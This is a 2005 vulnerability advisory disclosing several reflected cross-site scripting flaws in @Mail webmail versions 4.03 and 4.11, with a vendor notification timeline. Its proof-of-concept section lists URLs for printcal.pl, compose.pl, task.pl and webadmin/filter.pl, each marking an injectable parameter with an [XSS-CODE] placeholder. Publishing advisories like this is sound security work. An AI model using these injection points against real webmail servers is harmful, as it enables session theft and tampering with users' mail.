#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
##############################################
@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)
@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
#############
versions
#############
@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /
it is also posible other versions are vulnerable.
#################
Timeline
#################
Discovered:2-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005
##################
Proof of comcepts
##################
For exploit this flaws, need a clientlogin and for exploiting
all flaws in /webadmin/ need a admin login.
###################
princal.pl
###################
http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]
http://[victim]/printcal.pl?type=4[XSS-CODE]
###################
task.pl
###################
http://[victim]/task.pl?func=todo[XSS-CODE]
###################
compose.pl
####################
http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=
http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=
###################
webadmin/filter.pl
###################
http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1
http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1
######################## €nd ##########################
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....